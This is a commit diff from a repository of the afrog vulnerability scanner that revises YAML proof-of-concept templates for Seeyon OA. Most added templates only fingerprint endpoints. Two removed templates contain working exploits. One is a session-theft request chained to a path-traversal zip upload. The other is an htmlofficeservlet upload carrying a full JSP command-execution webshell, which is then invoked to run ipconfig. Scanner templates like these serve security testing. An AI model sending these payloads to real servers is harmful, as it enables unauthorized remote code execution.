STRLCPY/afrog

update some poc
zan8in committed 2 years ago

53176a2f

1 parent 1a37c4fb

Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/b-disclosure/seeyon-session-leak.yaml

		skipped 11 lines
12	12		request:
13	13		method: GET
14	14		path: /yyoa/ext/https/getSessionList.jsp?cmd=getAll
15		-	expression: response.status == 200 && response.body.bcontains(b"<SessionList>\r\n<Session>\r\n<usrID>")
	15	+	expression: response.status == 200 && response.body.bcontains(b"<usrID>") && response.body.bcontains(b"<sessionID>")
16	16		expression: r0()
17	17

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/c-unauthorized/seeyon-ajax-unauthorized-access.yaml

1	-	id: seeyon-ajax-unauthorized-access
2	-
3	-	info:
4	-	name: seeyon-ajax-unauthorized-access
5	-	author: x1n9Qi8
6	-	severity: high
7	-	reference:
8	-	- https://mp.weixin.qq.com/s/bHKDSF7HWsAgQi9rTagBQA
9	-	- https://buaq.net/go-53721.html
10	-
11	-
12	-	rules:
13	-	r0:
14	-	request:
15	-	method: GET
16	-	path: /seeyon/thirdpartyController.do.css/..;/ajax.do
17	-	expression: response.status == 200 && response.body.bcontains(bytes("java.lang.NullPointerException:null"))
18	-	r1:
19	-	request:
20	-	method: GET
21	-	path: /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile
22	-	expression: response.status == 200 && response.body.bcontains(bytes("MMOneProfile")) && response.body.bcontains(bytes("productTags")) && response.body.bcontains(bytes("serverIdentifier")) && response.content_type.contains("application/json")
23	-	expression: r0() && r1()
24	-

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/seeyon-a8-htmlofficeservlet-upload.yaml

1	+	id: seeyon-a8-htmlofficeservlet-upload
2	+
3	+	info:
4	+	name: Seeyon 致远OA A8 htmlofficeservlet 任意文件上传漏洞
5	+	author: zan8in
6	+	severity: critical
7	+	description: \|
8	+	远程攻击者在无需登录的情况下可通过向 URL /seeyon/htmlofficeservlet POST 精心构造的数据即可向目标服务器写入任意文件，写入成功后可执行任意系统命令进而控制目标服务器
9	+	title="致远A8-V5协同管理软件 V6.1sp1"
10	+	reference:
11	+	- https://www.cxyzjd.com/article/guangying177/110177339
12	+	- https://github.com/sectestt/CNVD-2019-19299
13	+	- http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20A8%20htmlofficeservlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
14	+
15	+
16	+	rules:
17	+	r0:
18	+	request:
19	+	method: GET
20	+	path: /seeyon/htmlofficeservlet
21	+	expression: response.status == 200 && response.body.bcontains(b'DBSTEP') && response.body.bcontains(b'htmoffice operate')
22	+	expression: r0()

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/e-vulnerability/seeyon-session-upload-webshell.yaml

1	-	id: seeyon-session-upload-webshell
2	-
3	-	info:
4	-	name: seeyon session upload webshell
5	-	author: zan8in
6	-	severity: critical
7	-	description: fofa app="致远互联-Seeyon-Server"
8	-
9	-	rules:
10	-	r0:
11	-	request:
12	-	method: POST
13	-	path: /seeyon/thirdpartyController.do
14	-	headers:
15	-	Content-Type: "application/x-www-form-urlencoded"
16	-	body: \|
17	-	method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1
18	-	expression: \|
19	-	response.status == 200 && response.body.bcontains(bytes("a8genius.do"))
20	-	output:
21	-	search: '"(?P<cokies>([a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}))".bsubmatch(response.body)'
22	-	cokies: search["cokies"]
23	-
24	-	r1:
25	-	request:
26	-	method: POST
27	-	path: /seeyon/fileUpload.do?method=processUpload
28	-	headers:
29	-	Content-Type: "multipart/form-data;boundary=---------------------------310945848325598073452977702743"
30	-	Cookie: "JSESSIONID={{cokies}}"
31	-	body: \|-
32	-	-----------------------------310945848325598073452977702743
33	-	Content-Disposition: form-data; name="file1"; filename="1.png"
34	-	Content-Type: image/png
35	-
36	-	%50%4b%03%04%14%00%00%00%08%00%0e%4e%3b%53%70%71%65%02%85%03%00%00%37%0a%00%00%0b%00%00%00%2e%2e%2f%68%31%32%33%2e%6a%73%70%b5%56%69%8f%d3%30%10%fd%2b%26%12%92%2d%22%8b%73%05%84%80%b6%bb%8b%84%b8%55%10%48%88%0f%8e%33%6d%03%b9%b0%1d%48%89%fa%df%19%1f%e9%c1%96%42%11%7c%d8%8d%63%bf%19%cf%7b%7e%f1%f4%c1%d5%2b%64%6a%54%51%cf%49%2f%d3%e8%96%3c%81%eb%d9%5d%71%4f%de%b8%73%f3%e6%6d%11%25%e3%6a%2b%b4%4e%23%fb%7f%33%57%e5%77%52%fc%a3%76%f6%5a%2f%59%42%64%89%43%f2%9e%40%6f%a0%ce%35%39%b3%ef%cf%1a%91%83%1a%da%2e%2b%0b%49%de%d3%ad%49%f2%9d%0d%ba%6b%41%d1%ef%2c%59%05%84%5b%27%af%69%b6%34%f0%e1%23%91%19%1b%14%98%4e%d5%c4%41%79%0e%b3%a2%06%87%a2%32%8b%c9%f5%18%31%bc%84%7a%6e%16%98%85%8c%79%42%7c%3f%26%d2%71%d6%34%25%88%9a%54%6c%20%46%2d%87%4f%e2%ab%e8%b9%54%cb%d6%34%fc%ac%68%17%58%91%4c%f7%cc%f2%39%98%27%b5%36%a2%96%40%a3%d3%8b%69%c4%12%c9%8b%ba%30%b4%7a%74%e3%fe%cd%b8%86%6f%64%27%4e%b7%20%f9%14%24%56%fe%14%96%53%7c%a3%bd%b4%69%26%58%8c%a6%2c%f6%59%58%12%a8%49%9e%37%8f%8b%5a%94%54%a3%8e%2b%29%8c%5c%10%7a%d1%4b%68%4d%d1%d4%04%d6%22%d4%5d%59%22%62%45%02%4d%ac%ca%e0%63%73%26%34%0c%35%23%43%18%62%28%49%7d%24%f2%26%8e%38%d7%20%3b%55%98%25%7f%0e%5a%8b%39%9c%17%73%d0%86%54%49%85%d8%03%88%5d%31%9e%9f%df%41%31%2a%de%b5%b9%30%40%f5%16%47%77%34%3a%9c%0c%f5%5c%31%f5%a8%15%af%84%59%f0%49%31%7f%52%1b%98%a3%07%6e%c4%a4%e2%b9%db%03%d1%dc%34%be%7a%7a%e3%c4%be%bc%6d%f1%f0%cf%84%06%6a%0f%f9%b2%40%c8%76%15%24%c2%47%42%7e%21%50%86%19%4e%6e%5f%d4%b2%c9%61%74%46%86%52%99%85%6a%be%69%b2%49%38%38%87%05%7c%12%a2%bf%8a%b2%83%1d%29%fd%7a%ea%c0%7c%d6%a8%17%a2%42%55%1c%bf%ce%14%25%9f%b8%75%94%e8%65%f6%09%a4%21%7e%67%85%39%7c%a4%d5%eb%39%98%45%93%d3%08%87%61%39%8a%dd%16%0c%3d%f6%b5%f9%0c%d4%63%c3%64%32%56%11%4e%9a%85%20%9b%ca%7f%16%6c%3b%2b%b8%d5%37%41%4d%cc%6c%0f%c0%e1%90%fa%10%3e%13%ee%3f%dd%d5%7a%c7%90%d3%a3%7d%ed%1e%8e%a0%5f%1e%80%53%84%ec%97%44%77%35%af%0a%2d%f9%e4%74%7a%71%72%7b%24%8a%6e%ff%95%32%b8%f3%da%67%08%fb%1b%d6%ff%8f%ed%4d%eb%b7%60%38%5f%da%25%cb%85%cd%02%9d%73%b0%5b%84%e2%ff%c4%72%3e%fa%1f%58%2e%87%83%96%3b%87%63%2c%e7%ab%62%98%f3%80%f8%6e%f5%b2%f8%9e%fb%25%f1%73%38%56%fc%e3%ac%36%12%dc%58%2d%87%3f%b4%da%11%6c%27%dd%6c%06%ea%ff%71%de%6b%b8%ab%0f%1f%5c%b5%9d%2c%78%05%af%60%91%ee%d8%4d%c1%97%2e%dc%d9%af%84%42%75%0c%28%d7%b0%f1%3a%76%e8%9e%da%47%4c%66%a2%d4%c0%92%62%46%a8%c6%db%1e%b7%b4%31%a7%06%cb%cf%3a%bc%d8%b1%f7%2f%4b%6c%da%11%4b%53%67%89%61%84%e9%bd%30%d7%12%df%53%b3%28%f4%4f%b2%6d%f5%7f%7b%cd%bf%76%05%30%24%0d%58%c1%10%0a%fe%39%eb%58%bb%8e%62%07%4f%9c%dd%8b%86%db%5e%73%aa%94%58%be%ec%4c%db%19%94%1b%44%45%84%52%f8%9e%da%1a%0e%02%e9%fa%23%99%a5%d4%ff%32%61%bf%a1%cf%7e%32%cb%8c%63%c5%28%1e%f5%7b%6e%4d%b4%d8%32%cf%1a%6c%6e%bd%b1%bd%4f%b7%4d%ad%c1%a6%7d%87%4d%d5%92%e7%df%ec%80%62%cf%e6%ba%cb%b4%ef%76%d7%63%ec%77%98%65%d3%ff%0e%06%ef%f4%b3%3e%14%81%b1%6b%ba%b6%0f%1b%d5%01%63%47%14%e1%4a%58%ed%ff%1d%82%a6%fb%01%50%4b%03%04%14%00%00%00%00%00%f5%64%8c%52%00%00%00%00%00%00%00%00%00%00%00%00%03%00%00%00%2e%2e%2f%50%4b%03%04%14%00%08%08%08%00%dd%74%24%51%00%00%00%00%00%00%00%00%00%00%00%00%0a%00%00%00%6c%61%79%6f%75%74%2e%78%6d%6c%e3%02%00%50%4b%07%08%93%06%d7%32%03%00%00%00%01%00%00%00%50%4b%01%02%3f%00%14%00%00%00%08%00%0e%4e%3b%53%70%71%65%02%85%03%00%00%37%0a%00%00%0b%00%24%00%00%00%00%00%00%00%20%00%00%00%00%00%00%00%2e%2e%2f%68%31%32%33%2e%6a%73%70%0a%00%20%00%00%00%00%00%01%00%18%00%64%a2%32%c4%41%b3%d7%01%64%a2%32%c4%41%b3%d7%01%53%52%2f%d9%57%2f%d7%01%50%4b%01%02%3f%00%14%00%00%00%00%00%f5%64%8c%52%00%00%00%00%00%00%00%00%00%00%00%00%03%00%24%00%00%00%00%00%00%00%10%00%00%00%ae%03%00%00%2e%2e%2f%0a%00%20%00%00%00%00%00%01%00%18%00%50%a5%c8%d9%55%2f%d7%01%50%a5%c8%d9%55%2f%d7%01%50%a5%c8%d9%55%2f%d7%01%50%4b%01%02%14%00%14%00%08%08%08%00%dd%74%24%51%93%06%d7%32%03%00%00%00%01%00%00%00%0a%00%00%00%00%00%00%00%00%00%00%00%00%00%cf%03%00%00%6c%61%79%6f%75%74%2e%78%6d%6c%50%4b%05%06%00%00%00%00%03%00%03%00%ea%00%00%00
37	-
38	-	-----------------------------310945848325598073452977702743
39	-	Content-Disposition: form-data; name="firstSave"
40	-
41	-	true
42	-	-----------------------------310945848325598073452977702743
43	-	Content-Disposition: form-data; name="callMethod"
44	-
45	-	resizeLayout
46	-	-----------------------------310945848325598073452977702743
47	-	Content-Disposition: form-data; name="isEncrypt"
48	-
49	-	0
50	-	-----------------------------310945848325598073452977702743
51	-	Content-Disposition: form-data; name="takeOver"
52	-
53	-	false
54	-	-----------------------------310945848325598073452977702743
55	-	Content-Disposition: form-data; name="type"
56	-
57	-	0
58	-	-----------------------------310945848325598073452977702743--
59	-	expression: \|
60	-	response.status == 200 && response.body.bcontains(bytes("fileurls"))
61	-	expression: r0() && r1()

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/f-CNVD/2021/CNVD-2021-01627.yaml

1	+	id: CNVD-2021-01627
2	+
3	+	info:
4	+	name: Seeyon 致远 OA 文件上传
5	+	author: gy741
6	+	severity: critical
7	+	description: fofa app="致远互联-Seeyon-Server"
8	+	reference:
9	+	- https://www.programmersought.com/article/92658169875/
10	+	- https://mp.weixin.qq.com/s/bHKDSF7HWsAgQi9rTagBQA
11	+	- https://buaq.net/go-53721.html
12	+	- http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20ajax.do%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%20CNVD-2021-01627.html
13	+
14	+
15	+	rules:
16	+	r0:
17	+	request:
18	+	method: GET
19	+	path: /seeyon/thirdpartyController.do.css/..;/ajax.do
20	+	expression: response.status == 200 && response.body.bcontains(bytes("java.lang.NullPointerException:null")) && response.content_type.contains("text/html")
21	+	expression: r0()
22	+

■ ■ ■ ■ ■ ■

pocs/afrog-pocs/g-CVE/2019/CNVD-2019-19299.yaml

1	-	id: CNVD-2019-19299
2	-
3	-	info:
4	-	name: 致远OA A8 htmlofficeservlet 任意文件上传漏洞
5	-	author: zan8in
6	-	severity: critical
7	-	description: \|
8	-	远程攻击者在无需登录的情况下可通过向 URL /seeyon/htmlofficeservlet POST 精心构造的数据即可向目标服务器写入任意文件，写入成功后可执行任意系统命令进而控制目标服务器
9	-	title="致远A8-V5协同管理软件 V6.1sp1"
10	-	reference:
11	-	- https://www.cxyzjd.com/article/guangying177/110177339
12	-	- https://github.com/sectestt/CNVD-2019-19299
13	-	- http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20A8%20htmlofficeservlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
14	-
15	-	set:
16	-	randstr: randomLowercase(16)
17	-	rules:
18	-	r0:
19	-	request:
20	-	method: POST
21	-	path: /seeyon/htmlofficeservlet
22	-	body: \|
23	-	DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV
24	-	OPTION=S3WYOSWLBSGr
25	-	currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
26	-	= WUghPB3szB3Xwg66 the CREATEDATE
27	-	recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6
28	-	originalFileId = wV66
29	-	originalCreateDate = wUghPB3szB3Xwg66
30	-	FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs
31	-	needReadFile = yRWZdAS6
32	-	originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4
33	-	<%@ page language="java" import="java.util.,java.io." pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("<pre>" +excuteCmd(request.getParameter("{{randstr}}")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
34	-	expression: response.body.bcontains(b'htmoffice operate')
35	-	r1:
36	-	request:
37	-	method: GET
38	-	path: /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig
39	-	expression: response.status == 200 && response.body.bcontains(b'Windows IP')
40	-	expression: r0() && r1()

update some poc